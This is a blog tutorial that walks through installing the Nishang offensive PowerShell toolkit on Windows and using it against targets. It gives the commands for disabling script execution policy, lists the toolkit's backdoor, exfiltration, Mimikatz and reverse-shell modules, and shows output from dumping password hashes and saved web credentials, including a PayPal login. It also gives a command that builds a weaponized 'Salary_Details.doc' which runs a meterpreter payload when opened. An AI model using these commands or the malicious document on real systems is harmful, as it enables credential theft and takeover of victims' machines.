As requested, this is the first post of many I’m doing on “hacking” and “pentesting.” Many admins aren’t comfortable with Linux, or just want to use convenient Windows-based tools, so that’s what we’re going to do. We’ll talk about a tool called Nishang, which you can use to do many different pentesting and security auditing techniques, using the Windows PowerShell 3.0.
To get started, you will need to download Nishang. You can click here to go directly to the GibHub page or click the link below to download the latest version directly. First, here’s a video the creator of Nishang gave at Defcon 21.
Download & Install
Once you’ve downloaded the zip file, extract it, rename the folder to nishang.ps and put it in the root of your c: drive.
Open the Windows PowerShell command prompt as Administrator. On Windows 10, click the start button and type “powershell” then right click and select “Run as Administrator.”
After you’re at the bright blue command prompt, navigate to the nishang.ps folder on the root of your c: drive.
cd ../.. cd .\nishang.ps\
Next, we will run a few commands to allow the Nishang PowerShell scripts to run. Here is a brief rundown of what we’re doing.
- Set-ExecutionPolicy Unrestricted – Allows unsigned scripts to be executed
- Get-ChildItem -Path ‘C:\nishang.ps\’ | Unblock-Files – Unblocks all of the PowerShell scripts within the nishang.ps folder
- Import-Module .\nishang.psm1 – Imports all of the Nishang scripts / modules for use in PowerShell
Note: Select “A” for Yes to All when prompted, after setting the execution policy in the first command.
Set-ExecutionPolicy Unrestricted Get-ChildItem -Path 'C:\nishang.ps\' | Unblock-Files Import-Module .\nishang.psm1
This is what it should look like in your window so far.
To see a list of all Nishang modules now available via the Powershell, use Get-Command.
Get-Command -Module nishang
There are quite a few, as you can see. Click here to see an image of the output.
PS C:\nishang.ps> Get-Command -Module nishang CommandType Name Version Source ----------- ---- ------- ------ Function Add-Exfiltration 0.0 nishang Function Add-Persistence 0.0 nishang Function Add-RegBackdoor 0.0 nishang Function Add-ScrnSaveBackdoor 0.0 nishang Function Base64ToString 0.0 nishang Function Check-VM 0.0 nishang Function Copy-VSS 0.0 nishang Function Create-MultipleSessions 0.0 nishang Function DNS_TXT_Pwnage 0.0 nishang Function Do-Exfiltration 0.0 nishang Function Download 0.0 nishang Function Download_Execute 0.0 nishang Function Download-Execute-PS 0.0 nishang Function Enable-DuplicateToken 0.0 nishang Function Execute-Command-MSSQL 0.0 nishang Function Execute-DNSTXT-Code 0.0 nishang Function Execute-OnTime 0.0 nishang Function ExetoText 0.0 nishang Function FireBuster 0.0 nishang Function FireListener 0.0 nishang Function Get-Information 0.0 nishang Function Get-LsaSecret 0.0 nishang Function Get-PassHashes 0.0 nishang Function Get-PassHints 0.0 nishang Function Get-Unconstrained 0.0 nishang Function Get-WebCredentials 0.0 nishang Function Get-Wlan-Keys 0.0 nishang Function Get-WmiShellOutput 0.0 nishang Function Gupt-Backdoor 0.0 nishang Function HTTP-Backdoor 0.0 nishang Function Invoke-ADSBackdoor 0.0 nishang Function Invoke-BruteForce 0.0 nishang Function Invoke-CredentialsPhish 0.0 nishang Function Invoke-Decode 0.0 nishang Function Invoke-Encode 0.0 nishang Function Invoke-Interceptor 0.0 nishang Function Invoke-JSRatRegsvr 0.0 nishang Function Invoke-JSRatRundll 0.0 nishang Function Invoke-Mimikatz 0.0 nishang Function Invoke-MimikatzWDigestDowngrade 0.0 nishang Function Invoke-Mimikittenz 0.0 nishang Function Invoke-NetworkRelay 0.0 nishang Function Invoke-PortScan 0.0 nishang Function Invoke-PoshRatHttp 0.0 nishang Function Invoke-PoshRatHttps 0.0 nishang Function Invoke-PowerShellIcmp 0.0 nishang Function Invoke-PowerShellTcp 0.0 nishang Function Invoke-PowerShellUdp 0.0 nishang Function Invoke-PowerShellWmi 0.0 nishang Function Invoke-Prasadhak 0.0 nishang Function Invoke-PSGcat 0.0 nishang Function Invoke-PsGcatAgent 0.0 nishang Function Invoke-PsUACme 0.0 nishang Function Out-CHM 0.0 nishang Function Out-DnsTxt 0.0 nishang Function Out-Excel 0.0 nishang Function Out-HTA 0.0 nishang Function Out-Java 0.0 nishang Function Out-JS 0.0 nishang Function Out-RundllCommand 0.0 nishang Function Out-SCF 0.0 nishang Function Out-SCT 0.0 nishang Function Out-Shortcut 0.0 nishang Function Out-WebQuery 0.0 nishang Function Out-Word 0.0 nishang Function Parse_Keys 0.0 nishang Function Remove-Persistence 0.0 nishang Function Remove-PoshRat 0.0 nishang Function Remove-Update 0.0 nishang Function Run-EXEonRemote 0.0 nishang Function Show-TargetScreen 0.0 nishang Function Speak 0.0 nishang Function Start-CaptureServer 0.0 nishang Function StringtoBase64 0.0 nishang Function TexttoEXE 0.0 nishang
An entire book could easily be written on the various modules included with Nishang. You can run a script locally to get an idea of what it’s capable of. For instance, let’s start with the Get-Information command. From the PowerShell, go ahead and run it.
As you can see, there is an incredible amount of information this module harvests for the attacker. How much will be extracted from the target machine depends on the operating system and what patches have been installed. Pen-Testing is an art and it requires a great deal of trial and error.
To get more specific information, such as password hashes, you can use the Get-PassHashes command. This will dump all of the local account password hashes. You can run it on your machine to get an idea of what it makes available. When executed against a target machine it will provide their password hashes.
Here is a screenshot of this command being ran against a Windows 10 workstation with the latest patches installed. The hashes are partially covered for obvious reasons.
Another very useful command is Get-WebCredentials. When this is executed against a target it will dump any saved usernames and passwords used for websites.
Here is the output of Get-Credentials ran against a target machine. Identifiable information has been rendered useless, once again, for obvious reasons.
As you can see, one of the dumped passwords was from paypal.com. That’s a pretty catastrophic security issue. A majority of people have a bank account tied to their paypal account, and at least a credit card. Not good!
Weaponized Word Document
With Nishang’s Out-Word command, you can embed a payload in a weaponized Microsoft Word .doc file that is instructed to download and execute a powershell meterpreter. This is an example of a command to do precisely this. It will create a Word document called “Salary_Details.doc” with the payload embedded.
Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'
As soon as the target opens the Word document and clicks Enable Editing, the payload is delivered and you have owned their machine..
The attacker now has a command line dropped to the target’s machine. All from a single word document.
Nishang Help Files
Every command included with Nishang includes a PowerShell help file. This is incredibly useful. I suggest running the help command against every included command as there is a wealth of useful information. Included is a description, synopsis, available parameters, syntax, notes, and website links with additional information.
To get help with a particular command, use the Get-Help command. In this example, we will read the help file on the Invoke-Mimikatz command.
As you can see, there is quite a bit of useful information provided.
PS C:\> Get-Help Invoke-Mimikatz -full Do you want to run Update-Help? The Update-Help cmdlet downloads the most current Help files for Windows PowerShell modules, and installs them on your computer. For more information about the Update-Help cmdlet, see http://go.microsoft.com/fwlink/?LinkId=210614. [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): NAME Invoke-Mimikatz SYNOPSIS This script loads Mimikatz completely in memory. SYNTAX Invoke-Mimikatz [[-ComputerName] <String>] [[-DumpCreds]] [<CommonParameters>] Invoke-Mimikatz [[-ComputerName] <String>] [[-DumpCerts]] [<CommonParameters>] Invoke-Mimikatz [[-ComputerName] <String>] [[-Command] <String>] [<CommonParameters>] DESCRIPTION This script leverages Mimikatz 2.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk. The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. Reflectively loads Mimikatz 2.1 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz. Function: Invoke-Mimikatz Author: Joe Bialek, Twitter: @JosephBialek Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: [email protected] Twitter @gentilkiwi License: http://creativecommons.org/licenses/by/3.0/fr/ Required Dependencies: Mimikatz (included) Optional Dependencies: None Mimikatz version: 2.1 alpha (17/02/2016) PARAMETERS -ComputerName <String> Optional, an array of computernames to run the script on. Required? false Position? 1 Default value Accept pipeline input? false Accept wildcard characters? false -DumpCreds [<SwitchParameter>] Switch: Use mimikatz to dump credentials out of LSASS. ...... .... ... .. .
If you get Permission Denied errors when attempting to install Nashing scripts, then you have not opened an “Administrative” PowerShell command prompt. This is done by right-clicking the PowerShell shortcut and selecting “Run as Administrator.” On some older versions of Windows, such as Windows 7, you have to hold down Shift + Right click to get the option to run as administrator.
This guide has taken you through the process of installing Nishang’s PowerShell module and has provided you with some examples of how to use a few of the available tools. There are countless way this toolkit can be used and this is really just the tip of the iceberg. I will be publishing additional resources to help guide you through using some more available tools in a more in-depth manner. But for now, play around with the available commands and see what’s possible. I have included some links with additional resources below. I implore you to check them out and use google to find usage examples others have provided. I hope you’ve found this guide helpful and if you have any questions, please feel free to post in the comments below!
Nishang Tookit Homepage – High level overview of modules
Nikhil SamratAshok Mittal’s Blog (Author of Nishang, hundreds of examples)